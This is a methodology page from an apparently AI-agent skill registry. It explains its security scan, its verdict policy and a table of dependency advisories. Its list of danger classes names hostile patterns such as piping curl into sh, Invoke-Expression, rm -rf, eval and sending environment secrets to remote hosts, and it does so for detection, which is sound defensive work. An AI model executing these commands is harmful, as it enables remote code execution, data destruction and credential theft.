Security & vetting
What we check, and how the Shield is earned
The Shield is granted only to popular, high-quality skills that pass a deep security scan. Unlike a star count, the scan reads the actual code and dependencies. This page is the full, open methodology — every Shielded skill has been checked against everything below, and is re-checked on a schedule.
- Skills scanned
- 40
- Shield-vetted
- 29
- Advisories tracked
- 57
- Last scan
- 2026-05-26
How the scan works
- 01
Fetch the real code
We pull the skill's marker file, manifests, and source from its GitHub repository — not just the README.
- 02
Static analysis
Every file is scanned for the danger patterns listed below, each located to a file and line.
- 03
Dependency check
Manifests (package.json, requirements.txt, …) are parsed and every dependency is matched against the OSV vulnerability database (CVEs + GitHub Security Advisories).
- 04
AI safety review
A model reviews the code and the static findings for concerns patterns miss — exfiltration, deceptive behaviour, malicious intent.
- 05
Verdict
Findings produce a verdict. The Shield is granted only on a clean pass.
Verdict policy
- Fail — any high- or critical-severity finding. The skill cannot earn the Shield.
- Warn — a medium-severity finding (e.g. a dependency advisory). The Shield is withheld and the finding is surfaced.
- Pass — only low/informational findings, or none. Combined with popularity, this earns the Shield.
Everything we check against
The exact danger classes the scan looks for, most severe first.
Unpinned remote code execution
criticalCode scanFetching and running code from the internet at install or runtime (curl | sh, Invoke-Expression).
Dynamic code evaluation
highCode scanUse of eval, exec, or Function() to execute strings as code.
Destructive filesystem operations
highCode scanRecursive or broad deletes (rm -rf, shutil.rmtree, recursive fs.rm).
Hardcoded secrets
highCode scanAPI keys, tokens, or passwords committed into the source.
Prompt injection
highCode scanInstructions that try to override the agent or exfiltrate the prompt, context, or secrets.
Deceptive or malicious behaviour
highAI reviewCode or instructions designed to deceive or harm the user, flagged by the AI safety review.
Data exfiltration
mediumAI reviewReading local files or environment variables and sending them to a remote host.
Shell / process execution
mediumCode scanSpawning shells or child processes (child_process, os.system, subprocess).
Obfuscated code
mediumCode scanLarge base64/hex blobs or packed code that hides what the skill does.
Credential prompts
mediumCode scanAsking the user or agent to paste secrets, especially alongside outbound requests.
Known dependency vulnerabilities
mediumDependency · OSVA dependency with a published CVE / GitHub advisory, matched against the OSV database.
Known vulnerabilities we've flagged
Advisories the scanner has matched to indexed skills via their dependencies, newest first.
| Advisory | Package | Severity | Skills |
|---|---|---|---|
| GHSA-9crc-q9x8-hgqq | vitest · npm | moderate | 4 |
| GHSA-xrxf-jgv3-qmrm | @openai/codex · npm | moderate | 2 |
| GHSA-w5fx-fh39-j5rw | @openai/codex · npm | moderate | 2 |
| GHSA-m95q-7qp3-xv42 | zod · npm | moderate | 4 |
| GHSA-x6fg-f45m-jf5q | semver · npm | moderate | 2 |
| GHSA-c2qf-rxjj-qqgw | semver · npm | moderate | 2 |
| MAL-2025-6023 | eslint-plugin-prettier · npm | moderate | 2 |
| GHSA-f29h-pxvx-f335 | eslint-plugin-prettier · npm | moderate | 2 |
| MAL-2025-6022 | eslint-config-prettier · npm | moderate | 2 |
| GHSA-f29h-pxvx-f335 | eslint-config-prettier · npm | moderate | 2 |
| GHSA-67mh-4wv8-2f99 | esbuild · npm | moderate | 2 |
| GHSA-hwj9-h5mp-3pm3 | postcss · npm | moderate | 1 |
| GHSA-7fh5-64p2-3v2j | postcss · npm | moderate | 1 |
| GHSA-566m-qj78-rww5 | postcss · npm | moderate | 1 |
| GHSA-f9xv-q969-pqx4 | yaml · npm | moderate | 2 |
| GHSA-48c2-rrv3-qjmp | yaml · npm | moderate | 2 |
| GHSA-qg8p-v9q4-gh34 | shell-quote · npm | moderate | 1 |
| GHSA-g4rg-993r-mgx7 | shell-quote · npm | moderate | 1 |
| GHSA-mvjj-gqq2-p4hw | react-dom · npm | moderate | 2 |
| GHSA-hg79-j56m-fxgv | react · npm | moderate | 2 |
| GHSA-g53w-52xc-2j85 | react · npm | moderate | 2 |
| GHSA-wc9v-mj63-m9g5 | pg · npm | moderate | 1 |
| GHSA-2w6w-674q-4c4q | handlebars · npm | moderate | 1 |
| GHSA-2qvq-rjwj-gvw9 | handlebars · npm | moderate | 1 |
| GHSA-2cf5-4w76-r9qv | handlebars · npm | moderate | 1 |
| GHSA-5j98-mcp5-4vw2 | glob · npm | moderate | 1 |
| GHSA-jj78-5fmv-mv28 | express · npm | moderate | 1 |
| GHSA-gpvr-g6gh-9mc2 | express · npm | moderate | 1 |
| GHSA-cm5g-3pgc-8rg4 | express · npm | moderate | 1 |
| GHSA-8hgg-xxm5-3873 | dompurify · npm | moderate | 1 |
| GHSA-63q7-h895-m982 | dompurify · npm | moderate | 1 |
| GHSA-39q2-94rc-95cp | dompurify · npm | moderate | 1 |
| GHSA-8jhw-6pjj-8723 | better-auth · npm | moderate | 1 |
| GHSA-569q-mpph-wgww | better-auth · npm | moderate | 1 |
| GHSA-36rg-gfq2-3h56 | better-auth · npm | moderate | 1 |
| GHSA-w48q-cv73-mx4w | @modelcontextprotocol/sdk · npm | moderate | 2 |
| GHSA-8r9q-7v3j-jr4g | @modelcontextprotocol/sdk · npm | moderate | 2 |
| GHSA-345p-7cg4-v4c7 | @modelcontextprotocol/sdk · npm | moderate | 2 |
| GHSA-c2gp-86p4-5935 | puppeteer · npm | moderate | 1 |
| GHSA-gp95-ppv5-3jc5 | sharp · npm | moderate | 1 |
| GHSA-54xq-cgqr-rpm3 | sharp · npm | moderate | 1 |
| MAL-2026-2853 | react-hook-form · npm | moderate | 1 |
| GHSA-8f24-v5vv-gm5j | next-intl · npm | moderate | 1 |
| GHSA-4c35-wcg5-mm9h | next-intl · npm | moderate | 1 |
| GHSA-f9wg-5f46-cjmw | next-auth · npm | moderate | 1 |
| GHSA-7r7x-4c4q-c4qf | next-auth · npm | moderate | 1 |
| GHSA-5jpx-9hw9-2fx4 | next-auth · npm | moderate | 1 |
| GHSA-267c-6grr-h53f | next · npm | moderate | 1 |
| GHSA-25mp-g6fv-mqxx | next · npm | moderate | 1 |
| GHSA-223j-4rm8-mrmf | next · npm | moderate | 1 |
Quality (maintenance, documentation, adoption) is scored separately — see the Skill Score methodology.